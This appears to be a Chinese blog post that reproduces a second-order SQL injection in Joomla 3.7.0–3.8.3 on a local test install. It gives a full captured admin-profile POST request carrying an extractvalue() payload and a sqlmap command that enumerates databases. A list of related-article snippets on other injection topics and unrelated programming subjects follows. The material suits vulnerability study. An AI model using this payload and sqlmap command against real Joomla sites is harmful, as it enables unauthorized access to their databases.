受影响Joomla版本:3.7.0 到 3.8.3

1、下载安装Joomla3.8.3,登录后台管理系统:http://127.0.0.1/joomla/administrator/index.php

2、访问编辑个人信息界面:

http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769

点击保存按钮,抓取数据包为(红色代码为测试payload):

POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771
Content-Type: multipart/form-data; boundary=---------------------------132821454821567
Content-Length: 1875
Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5
Connection: keep-alive
Upgrade-Insecure-Requests: 1 -----------------------------132821454821567
Content-Disposition: form-data; name="jform[name]" savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[username]" savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[password2]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[password]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[email]" 2@qq.com
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[registerDate]" 2018-02-28 09:13:57
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[lastvisitDate]" 2018-03-01 06:29:04
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[id]" 771
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_style][0]" extractvalue(1,concat(0x7e,(select version()) *))
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_language]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][language]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][editor]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][helpsite]" -----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][timezone]" -----------------------------132821454821567
Content-Disposition: form-data; name="task" profile.apply
-----------------------------132821454821567
Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583" 1
-----------------------------132821454821567--

3、sqlmap对上述数据包进行测试

sqlmap.py -r C:\Users\18721\Desktop\1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch

【研究】Joomla二阶注入的更多相关文章

  1. SQL注入之Sqli-labs系列第二十四关(二阶注入)

    开始挑战第二十四关(Second Degree Injections) 0x1 前言 SQL注入一般分为两类:一阶SQL注入(普通SQL注入),二阶SQL注入 .二次注入不是注入两次的意思,请不要混淆 ...

  2. joomla对象注入漏洞分析

    0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台就可以运行随意PHP代码. Joomla 安全团队紧急公布 ...

  3. ASP.NET Core技术研究-探秘依赖注入框架

    ASP.NET Core在底层内置了一个依赖注入框架,通过依赖注入的方式注册服务.提供服务.依赖注入不仅服务于ASP.NET Core自身,同时也是应用程序的服务提供者. 毫不夸张的说,ASP.NET ...

  4. CMS Joomla SQL注入漏洞练习(CVE-2017-8917 )

    0x01 原理 1.Joomla是内容管理的网站程序,也就是CMS.漏洞原理是com_fields组件,对请求数据过滤不严谨,从而导致sql注入.这个就是有问题的代码,可以看出sql根本没有过滤,通过 ...

  5. 【sqli-labs】 less24 POST- Second Order Injections *Real treat* -Stored Injections (POST型二阶注入 *真的好玩?* 存储注入)

    简单登陆浏览一遍后,发现是一个登陆注册修改密码的应用 审查一下代码 登陆页面的username,password使用了转义 注册页面的参数也进行了转义处理 但是在修改password的页面,直接从se ...

  6. joomla core注入漏洞

    注入语句如下: payload1 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullorder ...

  7. Exploiting second-order SQL injection 利用二阶注入获取数据库版本信息 SQL Injection Attacks and Defense Second Edition

    w SQL Injection Attacks and Defense  Second Edition Exploiting second-order SQL injection Virtually ...

  8. MySQL注入技巧性研究

    0x00 前言 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品.MySQL 是最流行的关系型数据库管理系统之一,本人最近针对MySQL注入做了 ...

  9. LDAP注入与防御解析

    [目录] 0x1 LDAP介绍 0x2 LDAP注入攻击及防御 0x3 参考资料 0x1 LDAP介绍 1 LDAP出现的背景 LDAP(Lightweight Directory Access Pr ...

随机推荐

  1. Luogu 2704 [NOI2001]炮兵阵地

    唔,想到了状压之后就不会了……实在是菜 考虑压两行,设$f_{i, j, k}$表示当前到第$i$行,上一行是$j$状态,前一行是$k$状态的最多能放的炮兵的数量. 发现第一维还可以滚掉,好像可以转移 ...

  2. Luogu 3616 富金森林公园

    刚看到此题的时候:sb分块??? Rorshach dalao甩手一句看题 于是回去看题……果然是题读错了…… [思路] 对权值离散化后(要先读入所有输入里的权值一起离散化……所以一共有4e4个数据( ...

  3. 4.python 系统批量运维管理器之paramiko模块

    paramiko paramiko是ssh服务最经常使用的模块,遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接. paramiko实现ssh2不外乎两个角度:SSH客户端与服务端 SS ...

  4. 如何确定tabcontrol哪一页码是活跃页???

    tabControl1.SelectedIndex属性 显示了现在显示的是哪一页码内的控件.

  5. Unity3D面试题整合

    第一部分 1. 请简述值类型与引用类型的区别答:区别:1.值类型存储在内存栈中,引用类型数据存储在内存堆中,而内存单元中存放的是堆中存放的地址.2.值类型存取快,引用类型存取慢.3.值类型表示实际数据 ...

  6. [转]history.back(-1)和history.go(-1)的区别

    目录: 1.这个方法的用途 2.两个方法的区别 3.总结 概述: H5页面做多了,自然就会做到页面上的返回功能,返回功能大致有两种:history.back(-1)和history.go(-1),今天 ...

  7. linux版本信息以及x86与x86_64的区别

    一 x86.x86_64.AMD64 x86是指intel的开发的一种32位指令集,从386开始时代开始的,一直沿用至今,是一种cisc指令集,所有intel早期的cpu,amd早期的cpu都支持这种 ...

  8. C#Task学习

    简介: Task 对象是一种的中心思想基于任务的异步模式首次引入.NET Framework 4 中. 因为由执行工作Task对象通常以异步方式执行线程池线程上而不是以同步方式在主应用程序线程中,可以 ...

  9. SQL/T-SQL实例参考-2

    对多关联查询,查询多中的记录,但是返回一的结果集 子查询语法 --一对多关联查询,查询多中的记录,但是返回一的结果集 SELECT C.* FROM ( SELECT A.BasicID FROM [ ...

  10. 所谓IIS未注册引起的故障及解决